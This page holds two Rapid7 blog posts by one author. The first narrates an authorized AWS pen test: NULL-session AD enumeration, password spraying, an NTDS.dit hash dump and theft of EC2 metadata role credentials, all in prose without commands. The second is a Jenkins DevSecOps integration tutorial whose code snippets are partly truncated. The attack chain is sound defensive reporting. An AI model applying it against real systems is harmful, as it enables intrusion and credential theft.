All posts by Arvind Vishwakarma

PenTales: There Are Many Ways to Infiltrate the Cloud

Post Syndicated from Arvind Vishwakarma original https://blog.rapid7.com/2023/07/27/pentales-there-are-many-ways-to-infiltrate-the-cloud/

PenTales: There Are Many Ways to Infiltrate the Cloud

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was engaged to do an AWS cloud ecosystem pentest for a large insurance group. The test included looking at internal and external assets, the AWS cloud platform itself, and a configuration scan of their AWS infrastructure to uncover gaps based on NIST’s best practices guide.

I evaluated their external assets but most of the IPs were configured to block unauthorized access. I continued to test but did not gain access to any of the external assets since, with cloud, once access has been blocked from the platform itself there is not a lot that I could do about it. But nevertheless, I continued to probe for cloud resources, namely S3 buckets, AWS Apps etc., using company-based keywords. For example: companyx, companyx.IT, companyx.media, etc.  Eventually, I found S3 buckets that were publicly available on their external network. These buckets contained sensitive information which definitely was a point of action for the client.

My next step was to complete a configuration scan of their AWS network, which provided complete visibility into their cloud infrastructure, including the resources that were running, the roles attached to the resources, the open services, etc. It also provided the customer valuable insights on the security controls that were missing based on the NIST’s best practices guide like the list of unused access keys, unencrypted disk volumes, keys that are not rotated every 90 days, insufficient logging, publicly accessible services like SSH, RDP, and many more. This scan was done using Rapid7’s very own InsightCloudSec tool which provides customers visibility into their cloud network and helps them identify gaps.

When testing the AWS cloud platform with the read-only credentials provided by the customer, I found they were locked with a strong IAM policy which allowed viewing of only cloud resources on the platform. However, there were no weaknesses in the IAM policy after attempts to enumerate vulnerabilities. This will be important later on!

Hardcoded credentials were found in Functions Apps and EC2 instance data but I was unable to utilize this further to escalate privileges. After enumerating the S3 buckets using the read-only credentials multiple S3 buckets containing customer invoices and payment data, along with Infrastructure-as-a-code files were found.  This provided information about how the customer managed their automated deployments. Beyond this, we were unable to find any vulnerabilities to escalate privileges, however, all the data accumulated during the phase was kept handy in case there would be a chance to chain vulnerabilities together and gain access during the next phases of the pentest. Although it was frustrating to not be able to find any ways to escalate privileges from the platform itself, enumerating it gave me plenty of understanding about their environment which would prove useful in the next phase.

In the final phase of the test, I tested all of the internal assets that were in-scope. These were primarily windows servers on EC2 instances hosting different kinds of services and applications. I enumerated the Active Directory Domain controllers on these servers and found that some AD servers allowed for NULL session enumeration which means you could connect to the AD server and dump out all of the domain information like users, groups, and password policies, without authentication.

Password spray attacks were deployed after all the users from the Domain were accessed. Pretty quickly, it was clear there were multiple users using weak passwords like Summer2023, Winter23, or Password1. Many accounts were even sharing the same passwords! This provided plenty of compromised credentials allowing me to go through the access levels provided to these compromised accounts. I found one account with Domain Admin access and dumped the NTDS.dit file from the AD Servers which contained hashes for all the domain users. With this, several accounts with weak passwords were cracked.

With access to multiple accounts in the bag, the only goal left was to gain some sort of access on the AWS platform. With all the data gathered from the AWS cloud platform test, I first looked at the EC2 Instances on the platform and what roles were assigned to each of them. Then I assessed accounts which had admin access. I found an ‘xx-main-ec2-prod’ role attached to an EC2 instance for which I had admin access through one of the compromised accounts. Using RDP to login to the EC2 instance, I pinged the IAM meta-data server and got the temporary AWS credentials for the ‘xx-main-ec2-prod’ role.

With these credentials, I created a new AWS profile and enumerated the permissions associated with this role. The ‘xx-main-ec2-prod’ role had access to list secrets in the AWS account, put and delete objects on all S3 buckets, send OS commands to all EC2 instances in the AWS account, and modify logs, as well. I proceeded to list some secrets in the AWS account to confirm the access that we had gained. With this level of access, I was able to show the client how an attacker could escalate privileges on their AWS platform.

In the end, this testing highlights how vast the attack surface would be on the cloud network. Even if you’ve locked down your cloud platform, the infrastructure assets could be vulnerable allowing attackers to compromise them and then laterally move to the cloud network. As organizations move their networks to the cloud, it would be important for them not to simply depend on the cloud platform to secure their network but also ensure that their individual assets are continuously tested and secured.

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

3 Steps to Integrate Rapid7 Products Into the DevSecOps Cycle

Post Syndicated from Arvind Vishwakarma original https://blog.rapid7.com/2021/08/02/3-steps-to-integrate-rapid7-products-into-the-devsecops-cycle/

3 Steps to Integrate Rapid7 Products Into the DevSecOps Cycle

DevSecOps is the concept and practice of integrating security into the DevOps cycle. The idea is to bring the different phases of security into the DevOps model and try to automate the entire process, so security is integrated directly into the initial application builds.

In this post, we’ll take a closer look at how to integrate security tools into the various phases of the DevSecOps cycle. We’ll focus here on Rapid7 tools like InsightVM, InsightAppSec, and InsightOps; the same principles apply to integrating other open-source security tools into the process.

In this simple, three-step setup, we’ll use Gitlab as the Version Control System and Jenkins as the build automation server. (Before getting started, you’ll need to have the integration between Gitlab and Jenkins completed.)

We’ll be using a simple declarative script in our pipeline, as follows:

pipeline {
    agent any
 
    stages {
        stage("build") {
            steps {
                echo "This is a build step"
            }
        }
        stage("test") {
            steps {
                echo "This is a test step"
            }
        }
        stage("release") {
            steps {
                    echo "This is an integration step"
                    sh "exit 1"

Step 1: Integrate InsightAppSec

First, we’ll include the InsightAppSec Scan in the pipeline. Ideally, this would be in the DAST stage.

To get started, we’ll install the InsightAppSec Plugin. We’ll need a few more details on hand, like the Scan Configuration ID and the InsightAPI key, which you can fetch from the InsightAppSec platform. We can then set up the scan on the InsightAppSec platform or use the InsightAppSec APIs to create a scan. Once we have the required details, we can kick-start the scan in our pipeline.

Here, we’ve used python script to add an app and create a scan configuration on the InsightAppSec platform.

3 Steps to Integrate Rapid7 Products Into the DevSecOps Cycle

Now, with the App Name and Scan Configuration ID, we can set up the scan in the pipeline with the following code:

stage(“dast-InsightAppSec”) {
steps {
catchError(buildResult: 'SUCCESS', stageResult: 'UNSTABLE')
{
insightAppSec region: 'US', insightCredentialsId: 'Insightappsec-api', scanConfigId: '9d31d36a-f590-4129-aba3-9212fe67fa8e', buildAdvanceIndicator: 'SCAN_COMPLETED', vulnerabilityQuery: 'vulnerability. severity=\'HIGH\'', maxScanPendingDuration: '0d 0h 10m', maxScanExecutionDuration: '0d 1h 0m', appId: 'HackMe', enableScanResults: true
}
}
}

We’ve replaced the “scanConfigId” and “appId” details ― we just need to replace the “insightCredentialsId” with the InsightAppSec API key. Setting the “enableScanResults” option to “true” will show results of the scan as a new option on the Jenkins Build page, with the label InsightAppSec Scan Results.

Step 2: Integrate the InsightVM Container Scanner

Next, we’ll integrate the InsightVM Container Scanner in the pipeline. In this step, we’ll build our Docker Image and scan it using InsightVM Container Scanner before pushing it into our registry to host apps in our staging or production environment.

To get started, we first have to install the InsightVM Container Scanner plugin on our Jenkins Server.

We’ll be building our Docker container using a Dockerfile, which we have to add to our Gitlab repository. After building the Docker container, we’ll scan it using the InsightVM Scanner.

We can set up the InsightVM Scanner in our pipeline with the following code:

stage("InsightVM Scan"){
            environment {
                dockerUrl = "https://registry.hub.docker.com"
                dockerCreds = "registry-auth" 
            }
            steps {
                script {
                    catchError(buildResult: 'SUCCESS', stageResult: 'UNSTABLE') {
                        dockerImage = docker.build('user/repo:$BUILD_NUMBER')
		echo "Built image ${dockerImage.id}"
		assessContainerImage failOnPluginError: true,
           	                	imageId: "${dockerImage.id}",
           		            		thresholdRules: [
                                    

The results of the pipeline should appear as a new option on the build page, with the label Rapid7 Assessment. Alternatively, the results are also available on the Builds tab of the Containers option within the InsightVM platform.

Step 3: Integrate InsightOps

In the final step, we’ll integrate InsightOps, Rapid7’s log management solution, into the pipeline. This integration will forward all the logs to the InsightOps platform.

To get started, we have to install the Logstash plugin on our Jenkins server. Then, to set up InsightOps, we’ll have to configure a collection source on our InsightOps platform.

Simply log into the InsightOps platform, then click on Add Data > Select Webhook — you’ll find this option under System data. Then, name the log set as Jenkins-Console and copy the URL for the log entries.

3 Steps to Integrate Rapid7 Products Into the DevSecOps Cycle

On the Jenkins Server, head to the Configuration page and scroll down to the Logstash option. Click on “Enable sending logs to an Indexer,” and select the Indexer type as Elastic Search. Finally, paste the log-entries URL that was copied from InsightVM. Remember to append the InsightAPI key to the URL.

3 Steps to Integrate Rapid7 Products Into the DevSecOps Cycle

To send the logs, we can either select the Enable Globally option or add the Logstash option to the pipeline, as shown in the following code:

pipeline {
    agent any
 
    stages {
        stage("build") {
            steps {
                echo "This is a build step"
            }
        }
        stage("test") {
            steps {
                echo "This is a test step"
            }
        }
        stage("release") {
            steps {
                    echo "This is an integration step"
                    sh "exit 1"
                }
            }
        }
        stage("deploy") {
            steps {
                input "Deploy to production?"
                echo "This is a deploy step."
            }
        }
    }
}

After editing the pipeline, we can run the build again and look at the logs data on our InsightVM dashboard.

3 Steps to Integrate Rapid7 Products Into the DevSecOps Cycle

Lastly, we’ve embedded some other open-source tools to complete our DevSecOps pipeline. The final pipeline looks something like this:

3 Steps to Integrate Rapid7 Products Into the DevSecOps Cycle

This three-step process is an intuitive way to integrate Rapid7 products into a DevSecOps pipeline, but it’s just one way to approach the task. Because our products support APIs, you can set up the integration according to your environment, so you have the flexibility to build the DevSecOps pipeline you need.